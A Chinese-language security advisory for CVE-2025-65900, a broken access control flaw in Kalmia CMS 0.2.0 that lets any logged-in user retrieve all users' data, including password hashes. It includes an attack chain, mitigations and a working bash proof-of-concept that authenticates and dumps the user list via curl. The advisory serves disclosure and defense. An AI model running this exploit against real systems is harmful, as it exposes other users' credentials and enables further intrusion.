CVE-2025-65900 Kalmia CMS 0.2.0 越权访问漏洞

漏洞信息

漏洞编号

CVE-2025-65900

漏洞类型

不正确的访问控制

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kalmia CMS

漏洞概述

Kalmia CMS 0.2.0版本中存在一个严重的不正确访问控制（Broken Access Control）漏洞。该漏洞位于/kal-api/auth/users API端点，由于后端对用户权限验证不足且存在过度数据暴露问题，导致任何具有基本读取权限的认证用户都可以通过该接口检索平台所有用户的敏感信息。攻击者只需拥有普通用户账号即可无需管理员权限即可获取其他用户的敏感数据，包括但不限于用户名、邮箱、密码哈希等重要信息。此漏洞的CVSS评分为6.5，属于中危级别，主要影响系统的机密性。攻击复杂度低，无需特殊攻击条件，危害性较大。建议受影响用户尽快升级到最新版本或应用官方提供的安全补丁。

技术细节

该漏洞的根本原因在于Kalmia CMS 0.2.0版本的访问控制机制存在设计缺陷。在/kal-api/auth/users端点实现中，后端API错误地认为只要用户通过身份认证就具有访问所有用户数据的权限，缺少对请求者实际权限级别的验证。具体表现为：API端点在处理用户列表请求时，未检查当前认证用户是否具有管理员角色或相应的数据访问权限，直接返回了完整的用户数据库查询结果。攻击者可以通过构造标准的HTTP GET请求到该端点，利用已获取的低权限认证凭据（如普通用户账号），即可获取平台所有注册用户的信息。返回的数据包含敏感字段如用户ID、用户名、邮箱地址、密码哈希值等。此外，该API还可能暴露用户角色信息、内部标识符等敏感元数据，为进一步的攻击提供情报支持。

攻击链分析

STEP 1

步骤1

攻击者获取Kalmia CMS普通用户账号（低权限账户）

STEP 2

步骤2

使用获取的凭据通过/kal-api/auth/login进行身份认证

STEP 3

步骤3

认证成功后，攻击者构造GET请求到/kal-api/auth/users端点

STEP 4

步骤4

由于API缺少权限验证，请求被服务器接受并返回所有用户数据

STEP 5

步骤5

攻击者获取所有用户的敏感信息，包括密码哈希，可用于进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-65900 PoC - Kalmia CMS Unauthorized User Data Access
# Target: Kalmia CMS v0.2.0
# Endpoint: /kal-api/auth/users

TARGET_URL="http://target-server.com"
USERNAME="regular_user"
PASSWORD="user_password"

# Step 1: Authenticate and obtain session/token
echo "[*] Authenticating as regular user..."
AUTH_RESPONSE=$(curl -s -X POST "${TARGET_URL}/kal-api/auth/login" \
  -H "Content-Type: application/json" \
  -d "{\"username\":\"${USERNAME}\",\"password\":\"${PASSWORD}\"}")

# Extract token (adjust based on actual response format)
TOKEN=$(echo "$AUTH_RESPONSE" | grep -oP '"token":"\K[^"]+')

if [ -z "$TOKEN" ]; then
    echo "[!] Authentication failed"
    exit 1
fi
echo "[+] Authentication successful"

# Step 2: Exploit the vulnerability - access all users' data
echo "[*] Exploiting CVE-2025-65900..."
USER_DATA=$(curl -s -X GET "${TARGET_URL}/kal-api/auth/users" \
  -H "Authorization: Bearer ${TOKEN}" \
  -H "Content-Type: application/json")

echo "[+] Retrieved sensitive user data:"
echo "$USER_DATA" | jq .

echo "[*] PoC completed - unauthorized access to all user information achieved"

影响范围

Kalmia CMS < 0.2.0

Kalmia CMS = 0.2.0

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 使用Web应用防火墙（WAF）规则限制对/kal-api/auth/users端点的访问，仅允许管理员IP访问；2) 临时禁用该API端点或将其设置为维护模式；3) 实施额外的应用层访问控制中间件，对用户角色进行强制验证；4) 监控和告警所有非管理员用户对该端点的访问请求；5) 考虑使用API网关进行细粒度的访问控制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65900
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65900
3 Details https://www.cvedetails.com/cve/CVE-2025-65900/
4 VulDB https://vuldb.com/cve/CVE-2025-65900
5 Link https://github.com/DifuseHQ/Kalmia
6 Link https://github.com/Noxurge/CVE-2025-65900/blob/main/README.md